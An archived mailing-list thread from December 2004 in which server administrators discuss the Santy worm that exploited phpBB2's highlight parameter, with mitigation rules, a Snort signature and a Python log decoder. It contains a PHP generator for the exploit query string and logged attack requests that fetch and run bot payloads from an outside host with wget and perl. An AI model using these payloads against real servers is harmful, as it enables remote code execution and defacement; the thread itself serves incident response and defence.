> >>This is a big issue on shared servers, or virtual hosts, whatever
> >>you want to call them.  Our site is on a shared server, and our
> >>site does not even run phpBB, but most of our HTML files were
> >>replaced with the worm's content.  Obviously, then, another site on
> >>the server must have an old version of phpBB.  But why could the
> >>worm, coming in through another site, modify files created by other
> >>users?  Even if the worm's script ran as the owner of the
> >>vulnerable viewtopic.php file, how could it then modify
> >>non-world-writable files created by other users?
> >>
> >>I have long been concerned with the security of PHP scripts,
> >>especially on shared servers.  Since PHP almost always runs as an
> >>Apache module, and Apache usually runs as nobody, one must make
> >>files and directories world-writable for PHP scripts to be able to
> >>write to them.  But that means that any process on the server,
> >>including anyone's PHP script, can modify the files.
> >>
> >>Thanks for any insights.
> >>
> >>Adam Porter
> >
> >At 21:28 -0600 22/12/2004, Alvin Packard wrote:
> >>
> >>Last look at my log files and I was hit a total of 421 times by 278
> >>different IPs. It seems to be moving rather quickly as these were from
> >>the last 2 days. Good luck to those who have not patched yet.
> >>
> >>Alvin Packard, CWNA
> >>www.networksecuritytech.com
> >
> >At 13:31 +0100 23/12/2004, Anders Henke wrote:
> >> > 1.  Why has the worm been as effective on Windows servers as on
> >>*nix servers?  At the very least, shouldn't the difference in file
> >>and directory naming cause a problem?  I looked at the decoded Perl
> >>script, but I'm not a Perl expert, so I couldn't understand all of
> >>it.  And what about the difference in file permissions?
> >>
> >>Perl does provide cross-platform-functions for e.g. file access and
> >>there's usually not much of a difference for running a well-written
> >>perl script on Unix as well as on Windows other than the first line
> >>(usually '#!c:\perl\perl.exe -w' on Windows and '#! /usr/bin/perl -w'
> >>on Unix).
> >>
> >>However, most Windows web servers other than Apache run any .pl script
> >>using the to-be-installed perl interpreter and don't care about the bang line.
> >>
> >>The documentation found in 'perldoc perlport' does give a closer view
> >>on the few differences when writing cross-platform perl scripts.
> >>
> >>> 2.  More importantly, why wasn't the worm's destructive ability
> >>>limited by file permissions, especially on *nix servers?  If, for
> >>>example, an HTML file on the server was uploaded by user bob, and
> >>>has permissions of 755, how can the Perl script delete that file?
> >>>Shouldn't the Perl script be created with the Perl process's
> >>>permissions, which was invoked by PHP, which should have the Web
> >>>server's permissions, which should be, at least on most *nix
> >>>servers, the nobody user?
> >>
> >>On shared servers with ISPs caring about security, user CGIs are using the
> >>suexec mechanism in order to run each customer within his own user's space.
> >>
> >>The downside of using suexec is that PHP as a CGI doesn't offer a small
> >>number of special features some people do believe to be essential, as well
> >>as some people do write code in a way that making it work on PHP as CGI
> >>is close to 'virtually impossible'. The PHP-Module also allows one to
> >>set PHP-configuration settings via .htaccess; those configuration
> >>changes are also ignored by CGI-PHP and can severely affect the way
> >>an PHP-written application works (or doesn't work).
> >>
> >>> This is a big issue on shared servers, or virtual hosts, whatever
> >>>you want to call them.  Our site is on a shared server, and our
> >>>site does not even run phpBB, but most of our HTML files were
> >>>replaced with the worm's content.  Obviously, then, another site
> >>>on the server must have an old version of phpBB.  But why could
> >>>the worm, coming in through another site, modify files created by
> >>>other users?  Even if the worm's script ran as the owner of the
> >>>vulnerable viewtopic.php file, how could it then modify
> >>>non-world-writable files created by other users?
> >>
> >>
> >>
> >>Right - if everyone were using e.g. suexec, this would be the case.
> >>
> >>As a web host, you've got to choose to run either CGI-PHP or PHP as a
> >>module.
> >>
> >>Your 'power'-users are calling for the module, the admin keeping
> >>maintenance on an already overloaded server also calls for the module
> >>(the module relieves the web server from forking a separate process for
> >>running a php-script), only those security-related ones are rejecting both
> >>mod_perl as well as mod_php and favour 'true' CGIs via suexec.
> >>
> >>If your scripts support the fastcgi extension, one might use mod_fastcgi
> >>with suexec support; however, this means one has to set up three pieces
> >>of software (fastcgi, suexec, php) and make them work together instead of the
> >>often-recommended 'add mod_php'-Oneliner. As a result, you're spending
> >>much work on a secure system, but your users are still calling for mod_php
> >>and in case any part of your setup breaks, your whole system is unusable.
> >>
> >>> I have long been concerned with the security of PHP scripts,
> >>>especially on shared servers.  Since PHP almost always runs as an
> >>>Apache module, and Apache usually runs as nobody, one must make
> >>>files and directories world-writable for PHP scripts to be able to
> >>>write to them.  But that means that any process on the server,
> >>>including anyone's PHP script, can modify the files.
> >>
> >>
> >>Yes, you've got the point.
> >>
> >>Apache 2 has the ability to run modules per VirtualHost within a different
> >>user context (perchild MPM).
> >>-According to the Apache documentation, this module is non-functional,
> >> not yet finished and development is not currently active.
> >>-PHP is certainly one of the most interesting modules for this feature,
> >> however, the last time I looked, exactly PHP didn't support it and Apache
> >> required to have at least one process running per virtualhost (which in
> >> turn would render servers hosting thousands of sites unusable).
> >>-Still today, the php documentation warns against using Apache 2.0 with PHP
> >> in a production environment.
> >>
> >>From a security standpoint ('secure' from the point of view of the
> >>administrator), CGI is currently the only way to run PHP securely.
> >>
> >>
> >>
> >>Regards,
> >>
> >>Anders
> >>--
> >>Schlund + Partner AG              Security and System Administration
> >>Brauerstrasse 48                  v://49.721.91374.50
> >>D-76135 Karlsruhe                 f://49.721.91374.225
> >
> >At 23:34 +0000 22/12/2004, William Geoghegan wrote:
> >>
> >>A script to check if your phpBB is vulnerable.
> >>Anything below 2.0.11 _probably_ is, but in case you're not sure, use
> >>this script.
> >>
> >>The script generates the request parameters, all you need to do is
> >>copy the result onto www.thesite.com/viewtopic.php
> >>
> >>
> >><?
> >>$rush='ls -al'; //do what
> >>$highlight='passthru($HTTP_GET_VARS[rush])'; // dont touch
> >>
> >>print "?t=%37&rush=";
> >>
> >>for ($i=0; $i<strlen($rush); ++$i) {
> >> print '%' . bin2hex(substr($rush,$i,1));
> >>}
> >>
> >>print "&highlight=%2527.";
> >>
> >>for ($i=0; $i<strlen($highlight); ++$i) {
> >> print '%' . bin2hex(substr($highlight,$i,1));
> >>}
> >>
> >>print ".%2527";
> >>?>
> >>
> >>Cheers.
> >>
> >>William Geoghegan
> >>
> >>GEOTEK Computer Services
> >>- www.geotekcs.co.uk -
> >
> >At 15:28 -0500 23/12/2004, Ofer Shezaf wrote:
> >>
> >>Interestingly enough the worm was probably developed on *nix and then
> >>checked and corrected to work on Windows:
> >>
> >>	eval{
> >>		while(my @a = getpwent()) { push(@dirs, $a[7]);}
> >>	};
> >>
> >>	push(@dirs, '/ ');
> >>
> >>the getpwent function is not supported on Windows. Actually the entire
> >>loop that gets users home directories from the /etc/passwd file is very
> >>*nix centric.
> >>
> >>The author found that out, added the eval statement to prevent the
> >>script from crashing on Windows and added the root directory in order to
> >>have at least one entry on windows. This last line actually makes the
> >>entire loop less important.
> >>
> >>Additionally, on Windows the worm would affect files on a single disk.
> >>As to which disk exactly, it probably depends on the web server
> >>attacked, and how PHP and Perl are installed and used with the web
> >>server. In some cases, if the web sites and the software do not reside
> >>on the same disk, the worm payload will not work.
> >>
> >>
> >>Ofer Shezaf, CTO
> >>Breach Security, Inc.
> >>Deployable Application Security
> >>
> >>Tel: +972.9.956.0036 ext.212
> >>Cell: +972.54.443.1119
> >>ofers@breach.com
> >
> >At 13:59 +0100 23/12/2004, Anders Henke wrote:
> >> > If you cannot fix it (virtual servers) fast for all your clients you could
> >>> also try with something like this:
> >>>
> >>>         RewriteEngine On
> >>>         RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [OR]
> >>>         RewriteCond %{QUERY_STRING} ^(.*)esystem(.*)
> >>>         RewriteRule ^.*$                                -               [F]
> >>>
> >>> We had some vhosts where this worked just fine. On our systems we didn't
> >>> see any valid request with echr and esystem, just be gentle with it, it
> >>> works for me, it could work for you ;)
> >>
> >>This assumes you're seeing GET-requests, but there are other ways
> >>(e.g. POST) to exploit such code.
> >>
> >>GET-requests are so kind as they do show up in full in the web servers
> >>access-log and as such, they do document the full exploit code.
> >>E.g. just the accesslogs do provide enough information for site owner and
> >>administrator to find out what's exactly broken and enables them to
> >>perform detailed analysis on even previously unknown exploits as well
> >>as reject such malicious code within a mod_rewrite-RewriteRule.
> >>
> >>Today, most such exploits are sent using HTTP-GET, but there's a fairly
> >>low expense for exploit code coders to run these exploits using HTTP-POST.
> >>We're lucky that most exploit code coders haven't chosen the struggle to
> >>properly encode their exploit-code HTTP-POST-requests, but still keep
> >>in mind that a 'plain' Apache cannot filter the payload from HTTP-POST
> >>other than rejecting =any= POST-request to 'specific' files like
> >>viewtopic.php, which obviously will sooner or later break some application.
> >>
> >>I've already had a single case where a 'common' insecurity like
> >>'include($some_user_supplied_data)' has been exploited using HTTP-POST,
> >>so for the administrators out there, it might be a good idea to test and
> >>implement mod_security on web servers.
> >>As far as I know, the POST-payload analysis of mod_security is currently
> >>one of the very few ways to audit and stop potentially malicious
> >>HTTP-POST-data from reaching your web server's CGIs.
> >
> >At 16:10 +0000 24/12/2004, <st...@uptime.org.uk> wrote:
> >>
> >>>This assumes you're seeing GET-requests, but there are other ways
> >>
> >>>(e.g. POST) to exploit such code.
> >>
> >>Whilst I understand your point, it should be noted that this
> >>vulnerability in phpBB is susceptible only to GET-based attacks:
> >>the vulnerable data is sourced from $HTTP_GET_VARS.
> >
> >At 19:12 +0100 24/12/2004, Raymond Dijkxhoorn wrote:
> >>
> >>>Whilst I understand your point, it should be noted that this
> >>>vulnerability in phpBB is susceptible only to GET-based attacks:
> >>>the vulnerable data is sourced from $HTTP_GET_VARS.
> >>
> >>And it seems worse, we see even upgraded phpbb2 installs (2.0.11)
> >>successfully and actively being exploited.
> >>
> >>216.22.10.90 - - [24/Dec/2004:18:42:54 +0100] "GET
> >>/phpBB2/viewtopic.php?t=753&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%
> >>3B%20cd%20/tmp;wget%20civa.org/pdf/bot;perl%20bot;wget%20civa.org/pdf/
> >>ssh.a;perl%20ssh.a%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527
> >>.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53
> >>%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 12758 "-"
> >>"LWP::Simple/5.803"
> >>66.152.98.103 - - [24/Dec/2004:19:02:15 +0100] "GET
> >>/phpBB2/viewtopic.php?t=753&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%
> >>3B%20cd%20/tmp;wget%20civa.org/pdf/bot;perl%20bot;wget%20civa.org/pdf/
> >>ssh.a;perl%20ssh.a%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527
> >>.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53
> >>%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 12758 "-"
> >>"LWP::Simple/5.79"
> >>64.62.187.10 - - [24/Dec/2004:19:04:11 +0100] "GET
> >>/phpBB2/viewtopic.php?t=817&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%
> >>3B%20cd%20/tmp;wget%20civa.org/pdf/bot;perl%20bot;wget%20civa.org/pdf/
> >>ssh.a;perl%20ssh.a%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527
> >>.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53
> >>%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 68131 "-"
> >>"LWP::Simple/5.63"
> >>[24/Dec/2004:19:09:26 +0100] "GET
> >>/phpBB2/viewtopic.php?p=7222&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F
> >>%3B%20cd%20/tmp;wget%20civa.org/pdf/bot;perl%20bot;wget%20civa.org/pdf
> >>/ssh.a;perl%20ssh.a%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%252
> >>7.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%5
> >>3%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 20767 "-"
> >>"LWP::Simple/5.803"
> >>205.214.85.184 - - [24/Dec/2004:19:10:18 +0100] "GET
> >>/phpBB2/viewtopic.php?p=7222&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F
> >>%3B%20cd%20/tmp;wget%20civa.org/pdf/bot;perl%20bot;wget%20civa.org/pdf
> >>/ssh.a;perl%20ssh.a%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%252
> >>7.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%5
> >>3%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 20875 "-"
> >>"LWP::Simple/5.802"
> >>
> >>Loads of those, and all request the files from civa.org
> >>
> >>This is on a patched phpbb2, so be aware!!
> >
> >
> >
> 
> 
> rgds
> 
> 
> 
> >Do anybody have any ideas on this e-mail?  My admin inbox was full
> >of these e-mails this morning, I don't know if
> >they're for real, or what...  Can someone please advice? There is
> >one phpbb running on the server...
> >
> >
> >HEADERS:
> >
> >Return-Path: <ww...@iris>
> >Received: from mail.the-server.net ([unix socket])
> >	by iris (Cyrus v2.1.15) with LMTP; Sat, 25 Dec 2004 00:50:24 +0100
> >X-Sieve: CMU Sieve 2.2
> >Received: from localhost (localhost [127.0.0.1])
> >	by mail.the-server.net (Postfix) with ESMTP id D8D11CA8E;
> >	Sat, 25 Dec 2004 00:50:23 +0100 (CET)
> >Received: from mail.the-server.net ([127.0.0.1])
> > by localhost (iris [127.0.0.1]) (amavisd-new, port 10024) with LMTP
> > id 13131-05-2; Sat, 25 Dec 2004 00:48:50 +0100 (CET)
> >Received: by mail.the-server.net (Postfix, from userid 30)
> >	id 00F16C874; Sat, 25 Dec 2004 00:48:48 +0100 (CET)
> >Date: Sat, 25 Dec 2004 00:48:48 +0100
> >To: postmaster, hostmaster, abuse, admin, root
> >Subject: YOUR SERVER HAS BEEN HACKED
> >Message-ID: <41...@iris.the-server.net>
> >User-Agent: nail 10.5 4/27/03
> >MIME-Version: 1.0
> >Content-Type: text/plain; charset=us-ascii
> >Content-Transfer-Encoding: 7bit
> >From: wwwrun (WWW daemon apache)
> >X-Virus-Scanned: by Kaspersky, NOD32 & F-Secure at the-server.net
> >
> >
> >MESSAGE BODY:
> >
> >YOUR SERVER HAS BEEN OWNED VIA PHPBB, PLEASE UPGRADE PHP AND PHPBB IMMEDIATELY
> >
> >
> 
> 



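As an added example (not code from any poster in this thread), the following Python script automates what Sebastian does by hand when he writes "Which decodes to:" for the logged viewtopic.php requests that Raymond and others quote above. It parses access-log lines, applies the two decodings the phpBB2 code path performs (PHP's own, then viewtopic.php's urldecode() of 'highlight', which is why the payloads carry %2527), turns chr(N).chr(N) runs back into readable strings, and flags lines that match the call names from the mod_security rule quoted later in the thread. The sample log lines are constructed for this example (documentation-range IPs, the PoC's harmless 'ls -al' as the command), with the parameter shapes copied from the thread's excerpts; as Anders notes, only GET requests can be examined this way, since a POST body never reaches the access log.

```python
"""Decode phpBB2 'highlight' exploit requests out of Apache access-log lines."""
import re
from urllib.parse import unquote_plus

# Common/combined log format prefix; anything after the response size is ignored.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)

# Call names from the mod_security rule quoted in the thread, plus eval.
DANGEROUS_CALL_RE = re.compile(
    r'\b(system|exec|passthru|popen|shell_exec|proc_open|fopen|fwrite|eval)\s*\(',
    re.IGNORECASE,
)

# A run of chr(N).chr(N)... as the worm uses to hide its strings.
CHR_RUN_RE = re.compile(r'chr\(\d{1,3}\)(?:\s*\.\s*chr\(\d{1,3}\))*')
CHR_ONE_RE = re.compile(r'chr\((\d{1,3})\)')


def parse_query(raw_query):
    """Split a raw query string and decode it once, as PHP does for $HTTP_GET_VARS."""
    params = {}
    for part in raw_query.split('&'):
        if not part:
            continue
        key, _, value = part.partition('=')
        params[unquote_plus(key)] = unquote_plus(value)
    return params


def decode_chr_calls(php):
    """Replace chr(112).chr(101)... runs with a readable double-quoted literal."""
    def to_literal(match):
        text = ''.join(chr(int(n)) for n in CHR_ONE_RE.findall(match.group(0)))
        text = text.replace('\\', '\\\\').replace('"', '\\"').replace('\n', '\\n')
        return '"' + text + '"'
    return CHR_RUN_RE.sub(to_literal, php)


def analyse_line(line):
    """Return a dict describing the request, or None if the line does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    path, _, raw_query = m.group('target').partition('?')
    params = parse_query(raw_query)
    # Second decode: viewtopic.php calls urldecode() on 'highlight' itself,
    # so %2527 in the log becomes %27 for PHP and a bare quote for phpBB.
    highlight = unquote_plus(params.get('highlight', ''))
    readable = decode_chr_calls(highlight)
    # The injection needs a quote to break out of the /e replacement string,
    # followed by a PHP call; an ordinary search term has neither.
    suspicious = (
        path.endswith('/viewtopic.php')
        and "'" in highlight
        and DANGEROUS_CALL_RE.search(readable) is not None
    )
    return {
        'ip': m.group('ip'),
        'path': path,
        'highlight': readable,
        'rush': params.get('rush', ''),  # shell command in the passthru variant
        'suspicious': suspicious,
    }


def analyse_log(lines):
    """Analyse every parsable line and return the list of result dicts."""
    results = []
    for line in lines:
        result = analyse_line(line)
        if result is not None:
            results.append(result)
    return results


# Constructed sample lines (not from the thread): payload shapes copied from
# the thread's excerpts, documentation-range IPs, 'ls -al' as the command.
SAMPLE_LOG = [
    '192.0.2.10 - - [24/Dec/2004:19:02:15 +0100] "GET /phpBB2/viewtopic.php?t=7'
    '&rush=%6C%73%20%2D%61%6C&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54'
    '%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.1"'
    ' 200 12266 "-" "LWP::Simple/5.803"',
    '192.0.2.11 - - [24/Nov/2004:14:09:05 +0200] "GET /viewtopic.php?t=50674'
    '&highlight=%2527%252esystem(chr(100)%252echr(105)%252echr(114))%252edie()'
    '%252e%2527 HTTP/1.1" 404 219 "-" "-"',
    '192.0.2.12 - - [24/Dec/2004:19:05:00 +0100] "GET /phpBB2/viewtopic.php?t=7'
    '&highlight=apache+module HTTP/1.1" 200 9000 "-" "Mozilla/4.0"',
]

if __name__ == '__main__':
    for r in analyse_log(SAMPLE_LOG):
        flag = 'EXPLOIT' if r['suspicious'] else 'ok'
        print(f"{flag:7} {r['ip']} {r['path']} highlight={r['highlight']!r} "
              f"rush={r['rush']!r}")
```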


Re: [users@httpd] Is this for real?

Posted by Dave Floyd <da...@pa.press.net>.
Anders,
	Sadly this is quite likely. See the appended messages for more details:

At 20:23 +1100 21/12/2004, L. Walker wrote:
>Date: Tue, 21 Dec 2004 20:23:11 +1100 (EST)
>Subject: Worm hitting PHPbb2 Forums
>From: "L. Walker" <lw...@magi.net.au>
>To: incidents@securityfocus.com
>Cc: full-disclosure@lists.netsys.com
>
>Just spotted two clients hit by this.  One client didn't update his
>software (PHP 4.3.4, Apache 1.3.22) and was rootkitted by generation 16.
>Chkrootkit says it's Adore, however could be something else.  Datacenter
>wasn't very smart and has since wiped the server, so no binaries or other
>evidence.
>
>Generation 12 only wiped out PHP files, replacing them with its own
>message on other client's PHPbb2 forum.  Access logs show:
>
>66.220.28.92 - - [21/Dec/2004:18:07:17 +1100] "GET
>/forum/viewtopic.php?p=1445&sid=d2260869a73fb5aca2aed0d8a88cf55a&high 
>light=%2527%252Esystem(chr(112)%252echr(101)%252echr(114)%252echr(108) 
>%252echr(32)%252echr(45)%252echr(101)%252echr(32)%252echr(34)%252echr( 
>111)%252echr(112)%252echr(101)%252echr(110)%252echr(32)%252echr(79)%25 
>2echr(85)%252echr(84)%252echr(44)%252echr(113)%252echr(40)%252echr(62) 
>%252echr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252ech 
>r(111)%252echr(102)%252echr(41)%252echr(32)%252echr(97)%252echr(110)%2 
>52echr(100)%252echr(32)%252echr(112)%252echr(114)%252echr(105)%252echr 
>(110)%252echr(116)%252echr(32)%252echr(113)%252echr(40)%252echr(72)%25 
>2echr(89)%252echr(118)%252echr(57)%252echr(112)%252echr(111)%252echr(5 
>2)%252echr(122)%252echr(51)%252echr(106)%252echr(106)%252echr(72)%252e 
>chr(87)%252echr(97)%252echr(110)%252echr(78)%252echr(41)%252echr(34))% 
>252e%2527
>HTTP/1.0" 200 270
>"http://www.noobforces.net/forum/viewtopic.php?p=1445&sid=d2260869a73 
>fb5aca2aed0d8a88cf55a&highlight=%2527%252Esystem(chr(112)%252echr(101) 
>%252echr(114)%252echr(108)%252echr(32)%252echr(45)%252echr(101)%252ech 
>r(32)%252echr(34)%252echr(111)%252echr(112)%252echr(101)%252echr(110)% 
>252echr(32)%252echr(79)%252echr(85)%252echr(84)%252echr(44)%252echr(11 
>3)%252echr(40)%252echr(62)%252echr(109)%252echr(49)%252echr(104)%252ec 
>hr(111)%252echr(50)%252echr(111)%252echr(102)%252echr(41)%252echr(32)% 
>252echr(97)%252echr(110)%252echr(100)%252echr(32)%252echr(112)%252echr 
>(114)%252echr(105)%252echr(110)%252echr(116)%252echr(32)%252echr(113)% 
>252echr(40)%252echr(72)%252echr(89)%252echr(118)%252echr(57)%252echr(1 
>12)%252echr(111)%252echr(52)%252echr(122)%252echr(51)%252echr(106)%252 
>echr(106)%252echr(72)%252echr(87)%252echr(97)%252echr(110)%252echr(78) 
>%252echr(41)%252echr(34))%252e%2527"
>"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
>
>--
>L. Walker <lwalker at magi dot net dot au>
>Network Administrator / Consultant
>--
>
>>At 12:46 -0500 21/12/2004, Christopher Adickes wrote:
>
>In addition to your post here is some more info. 
>
>http://isc.sans.org/
>
>>At 10:47 -0700 21/12/2004, mark@onnow.net wrote:
>
>From what I have read, this can happen in any phpbb version lower than 2.0.11
>
>This exploit is becoming frequent.  Normally uploading a ddos bot.
>>
>>At 12:53 -0500 21/12/2004, Chris Ess wrote:
>>
>>Generation 9 appears to overwrite files with the following extensions:
>>.htm, .php, .asp, .shtm, .jsp, .phtm
>>
>>It only displays a defacement message saying
>>
>>"NeverEverNoSanity WebWorm generation #"
>>
>>Where # is the generation of the worm.
>>
>>This bug only exploits a hole in phpBB2 as far as I can tell.  It does not
>>appear to exploit a hole within PHP.  In order to protect yourself, you
>>must upgrade phpBB2 to version 2.0.11.  See
>>http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513
>>
>>The only code modification that this worm appears to do is increment its
>>generation count every time it hits a server.  Generation 9 does not
>>contain anything that would indicate the ability to install a rootkit.  I
>>suspect that the rootkit may have been installed separately.
>>
>>I extracted a full copy of generation 9 of this worm based on the access
>>logs of a site hit by it.  I was going to do a code review whenever I got
>>the chance to properly do one.
>>
>>Sincerely,
>>
>>
>>Chris Ess
>>System Administrator / CDTT (Certified Duct Tape Technician)
>
>>At 11:29 -0700 21/12/2004, lists <li...@innocence-lost.net> wrote:
>
>Funny enough, I got a message from a former employer about this worm
>yesterday- a box I had setup that had hardened php on it got hit hard by
>this worm. I must've misread the advisory as I was under the impression
>that the Hardened PHP patches protected PHP through canary values from
>this bug? Or does it use more than just unserialize() (i.e. realpath() )
>
>>At 14:14 -0500 21/12/2004, Chris Ess wrote:
>
>> Funny enough, I got a message from a former employer about this worm
>> yesterday - a box I had setup that had hardened php on it got hit hard by
>> this worm. I must've misread the advisory as I was under the impression
>> that the Hardened PHP patches protected PHP through canary values from
>> this bug? Or does it use more than just unserialize() (i.e. realpath() )
>
>This worm appears to have nothing to do with the bugs fixed in versions
>4.3.10 and 5.0.3 of PHP.
>
>The bug occurs in this line in viewtopic.php in phpBB2:
>(Formatting changed to make it look pretty.  It's line 1109 in phpBB2
>2.0.10)
>
>$message = str_replace('\"', '"',
>	substr(preg_replace('#(\>(((?>([^><]+|(?R)))*)\<))#se',
>	"preg_replace('#\b(" . $highlight_match . ")\b#i',
>	'<span style=\"color:#"
>	. $theme['fontcolor3'] . "\"><b>\\\\1</b></span>', '\\0')", '>' .
>	$message . '<'), 1, -1));
>
>The 'e' flag on the regex pattern tells it to interpret the statement as
>valid PHP code and run it.  (Reference is:
>http://www.php.net/manual/en/reference.pcre.pattern.modifiers.php)
>
>The bug that is exploited works in such a way that it actually runs the
>command that is passed through the highlight GET variable.  I'm not 100%
>sure how this works since I haven't had the chance to correlate the
>strings recorded in apache's access log with the above code.
>
>>At 12:21 -0700 21/12/2004, lists wrote:
>
>Yea good catch, after looking into it a little further I found that it
>wasn't related to that advisory, but rather to one from 11.13.04, the
>exploit code of the original bug can be found on k-otik.com
>
>Thanks for the info
>
>>At 21:00 +0000 21/12/2004, Barrie Dempster <ba...@reboot-robot.net> wrote:
>
>More information:
>
>Mis-reported and then corrected at the ISC -
>http://isc.sans.org/diary.php?date=2004-12-21
>
>* The advisory is here - http://howdark.com/
>(it was there when the advisory was initially released but that site
>seems down atm, included here in hope that howdark.com resurfaces)
>
>* The fix is here - http://www.phpbb.com/phpBB/viewtopic.php?t=240513
>
>* The exploit is here - http://www.howdark.com/poc/phpbb2010_hl.phps
>(down as above, but included here as it was the original source, try
>here http://www.k-otik.com/exploits/20041122.r57phpbb2010.pl.php )
>
>* SNORT Rule is here - http://www.webservertalk.com/message554529.html
>
>* If you got owned by this then your Christmas present is here
>http://ysati.com hehe ;-P
>
>With Regards..
>Barrie Dempster (zeedo) - Fortiter et Strenue
>
>>At 13:28 -0500 21/12/2004, Mike <mi...@shaw.ca> wrote:
>
>Does this affect PHPBB2 in general, or is it platform specific as well?
>
>>At 19:53 -0500 21/12/2004, M. Shirk wrote:
>
>I missed an important "F" on my previous post for these snort sigs.
>
>alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS 
>(msg:"BLEEDING-EDGE phpBB Highlighting Code Execution - Santy.A 
>Worm"; flow:to_server,established; uricontent:"/viewtopic.php?"; 
>nocase; uricontent:"&highlight='.fwrite(fopen("; nocase; 
>reference:url,www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513; 
>sid:9999999; rev:1;)
>
>Shirkdog
>http://www.shirkdog.us
>
>

At 15:51 -0800 20/12/2004, Shannon Lee wrote:
>X-VirusChecked: Checked
>X-Env-Sender: bugtraq-return-17330-dave.floyd=pa.press.net@securityfocus.
>  com
>X-StarScan-Version: 5.4.5; banners=-,-,-
>X-Originating-IP: [205.206.231.26]
>X-SpamWhitelisted: domain whitelist
>Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
>List-Id: <bugtraq.list-id.securityfocus.com>
>List-Post: <ma...@securityfocus.com>
>List-Help: <ma...@securityfocus.com>
>List-Unsubscribe: <ma...@securityfocus.com>
>List-Subscribe: <ma...@securityfocus.com>
>Delivered-To: mailing list bugtraq@securityfocus.com
>Delivered-To: moderator for bugtraq@securityfocus.com
>Date: Mon, 20 Dec 2004 15:51:13 -0800
>From: Shannon Lee <sh...@webhostworks.net>
>User-Agent: Mozilla Thunderbird 0.7.3 (X11/20040803)
>X-Accept-Language: en-us, en
>To: bugtraq@securityfocus.com
>Subject: phpBB Worm
>
>This morning one of our client's sites was found to have been defaced
>with the words "NeverEverNoSanity WebWorm Generation 9."  The defacement
>appeared to take place on all .html files in the web root trees of
>multiple virtual hosts on the web server in a very short period of time.
>
>After some investigation, we determined that the attacker had gained
>access via phpbb in a series of crafted URL requests, like so:
>
>64.235.234.84 - - [20/Dec/2004:08:41:35 -0800] "GET
>/viewtopic.php?p=9002&sid=f5
>399a2d243cead3a5ea7adf15bfc872&highlight=%2527%252Efwrite(fopen(chr(1 
>09)%252echr
>(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102), 
>chr(97)),ch
>r(35)%252echr(33)%252echr(47)%252echr(117)%252echr(115)%252echr(114)% 
>252echr(47)
>%252echr(98)%252echr(105)%252echr(110)%252echr(47)%252echr(112)%252ec 
>hr(101)%252
>echr(114)%252echr(108)%252echr(10)%252echr(117)%252echr(115)%252echr( 
>101)%252ech
>r(32)),exit%252e%2527 HTTP/1.0" 200 13648 "http://forum.CLIENT SITE
>OMITTED.com/
>viewtopic.php?p=9002&sid=f5399a2d243cead3a5ea7adf15bfc872&highlight=% 
>2527%252Efw
>rite(fopen(chr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50) 
>%252echr(11
>1)%252echr(102),chr(97)),chr(35)%252echr(33)%252echr(47)%252echr(117) 
>%252echr(11
>5)%252echr(114)%252echr(47)%252echr(98)%252echr(105)%252echr(110)%252 
>echr(47)%25
>2echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(10)%252echr 
>(117)%252ec
>hr(115)%252echr(101)%252echr(32)),exit%252e%2527" "Mozilla/4.0
>(compatible; MSIE 6.0; Windows NT 5.1)"
>
>After checking the phpbb site, it turns out that this is a vulnerability
>posted the 18th of November, called Hilight; we didn't update to prevent
>it because the client whose domain it was has their own admin, and we
>thought he was taking care of phpBB.  Oops.  The exploit is described here:
>
>http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513
>
>When I copied all these entries out of the log and translated the chr()
>calls, they turned out to be the attached perl script, which is capable
>of finding .html files to deface, and then going to google and finding
>more instances of phpbb to infect.  Which makes it a worm.  It also
>tracks itself by generation; we were generation 9.
>
>Please find attached the above-mentioned script as well as the series of
>log entries from access_log.
>
>--Shannon
>
>
>
>At 23:28 +0100 21/12/2004, Raymond Dijkxhoorn wrote:
>>
>>If you cannot fix it (virtual servers) fast for all your clients 
>>you could also try with something like this:
>>
>>        RewriteEngine On
>>        RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [OR]
>>        RewriteCond %{QUERY_STRING} ^(.*)esystem(.*)
>>        RewriteRule ^.*$                                -               [F]
>>
>>We had some vhosts where this worked just fine. On our systems we
>>didn't see any valid request with echr and esystem, just be gentle
>>with it, it works for me, it could work for you ;)
>
>At 15:11 -0500 21/12/2004, Paul Kurczaba wrote:
>>
>>It seems that a good number of sites have been compromised due to this
